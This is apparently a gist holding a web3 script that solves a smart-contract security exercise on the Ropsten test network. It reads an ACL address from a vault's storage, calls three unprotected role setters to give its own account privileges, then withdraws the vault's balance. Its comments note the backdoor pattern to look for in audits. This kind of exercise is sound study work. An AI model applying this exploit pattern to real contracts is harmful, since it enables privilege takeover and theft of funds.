Last active
October 11, 2022 06:45
solution to the exercise
// https://medium.com/nomic-labs-blog/malicious-backdoors-in-ethereum-proxies-62629adf3357
const Web3 = require('web3');

// Account used to sign and send every transaction in this script.
// The address, key and Infura project id below are placeholders (all 'b').
const MyAccountAddr = '0xbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb';

// SECURITY: a private key written into a source file is exposed to anyone who
// can read the file or its history. Load real keys from the environment or a
// secrets store and keep them out of version control and shared gists.
const MyAccountKey = '0xbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb';

// Ropsten test-network RPC endpoint; the last path segment is the Infura project id.
const RopstenInfuraNode = 'https://ropsten.infura.io/v3/bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb';

// Passed as `chainId` when transactions are signed in sendTx.
const RopstenNetworkId = '3';

const web3 = new Web3(RopstenInfuraNode);
/**
 * Read one storage word of a contract and interpret its tail as an address.
 *
 * Contract storage can be read by anyone through a node's RPC interface, so an
 * address kept in a non-public state variable is not hidden from a reviewer.
 *
 * @param {string} contract - Address of the contract whose storage is read.
 * @param {number|string} slot - Storage slot passed to web3.eth.getStorageAt.
 * @returns {Promise<string>} `0x` followed by the last 40 hex characters of the word.
 */
async function getAddressAtStorage(contract, slot) {
  const word = await web3.eth.getStorageAt(contract, slot);
  // An address is 20 bytes, i.e. the last 40 hex characters of the returned word.
  return `0x${word.slice(-40)}`;
}
/**
 * Sign a contract call with MyAccountKey and broadcast it through `web3`.
 *
 * @param {object} tx - web3 contract method object; must provide estimateGas() and encodeABI().
 * @param {number|string} value - Amount of wei attached to the transaction.
 * @param {string} to - Address of the contract that receives the call.
 * @param {number} [gasLimit] - Base gas figure; when falsy, tx.estimateGas() is used instead.
 * @returns {Promise<void>} Resolves once sendSignedTransaction resolves.
 */
async function sendTx(tx, value, to, gasLimit = undefined) {
  let gas = gasLimit;
  if (!gas) {
    gas = await tx.estimateGas({ from: MyAccountAddr });
  }

  const networkGasPrice = await web3.eth.getGasPrice();
  const nonce = await web3.eth.getTransactionCount(MyAccountAddr);

  const signed = await web3.eth.accounts.signTransaction(
    {
      to,
      data: tx.encodeABI(),
      value,
      // Both figures are padded: 20x the base gas (estimated or supplied)
      // and 10x the gas price reported by the node.
      gas: gas * 20,
      gasPrice: networkGasPrice * 10,
      nonce,
      chainId: RopstenNetworkId,
    },
    MyAccountKey,
  );

  await web3.eth.sendSignedTransaction(signed.rawTransaction);
}
/**
 * Walk through the exercise from the article linked at the top of the file
 * against one vault contract on Ropsten.
 *
 * The flow is: check balances, read the ACL contract address out of the
 * vault's storage slot 0, call three ACL role setters with MyAccountAddr,
 * then call withdraw() on the vault.
 *
 * @returns {Promise<void>} Returns early, sending nothing, when the balance checks fail.
 */
async function main() {
  const targetContract = '0xB97DD0102bB67f81d25D686C661d7F0AED62E344';

  // 0. Pre-flight balance checks.
  // NOTE(review): the names suggest these thresholds mirror require()
  // conditions inside the vault contract; confirm against the contract source.
  const passRequire1 = 0.001 * (10 ** 18);
  const passRequire2 = 0.01 * (10 ** 18);
  const balance = await web3.eth.getBalance(targetContract);
  const balanceMy = await web3.eth.getBalance(MyAccountAddr);
  const value = Number(balance) + passRequire2;
  console.log("balance, balaceMy, value", balance, balanceMy, value);

  const vaultBelowMinimum = Number(balance) < passRequire1;
  const senderCannotCover = Number(balanceMy) < value;
  if (vaultBelowMinimum || senderCannotCover) {
    return;
  }

  // 1. The vault keeps the address of its ACL contract in storage slot 0.
  const acl = await getAddressAtStorage(targetContract, 0);
  const ACLContractABI = require('../build/contracts/ACL.json').abi;
  const aclContract = new web3.eth.Contract(ACLContractABI, acl);

  // 2. Call the three numerically named role setters with our own address.
  // Review point: the calls are sent from an ordinary account, so the script
  // relies on these setters not being restricted to an owner. Setters with
  // opaque numeric names and no caller check are the pattern to look for when
  // auditing a proxy or ACL contract for a backdoor.
  console.log("sendTx setACLRole7123909213907581092");
  await sendTx(aclContract.methods.setACLRole7123909213907581092(MyAccountAddr), 0, acl);

  console.log("sendTx setACLRole8972381298910001230");
  await sendTx(aclContract.methods.setACLRole8972381298910001230(MyAccountAddr), 0, acl);

  console.log("sendTx setACLRole5999294130779334338");
  await sendTx(aclContract.methods.setACLRole5999294130779334338(MyAccountAddr), 0, acl);

  // 3. Call withdraw() on the vault, attaching `value` and a fixed base gas
  // figure of 100000 (sendTx multiplies it by 20).
  const VaultContractABI = require('../build/contracts/Vault.json').abi;
  const vaultContract = new web3.eth.Contract(VaultContractABI, targetContract);
  console.log("sendTx withdraw");
  await sendTx(vaultContract.methods.withdraw(), value, targetContract, 100000);
}
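// Handle rejection explicitly so a failed RPC call or reverted transaction is
// reported and reflected in the exit code instead of leaving the promise floating.
main().catch((err) => {
  console.error(err);
  process.exitCode = 1;
});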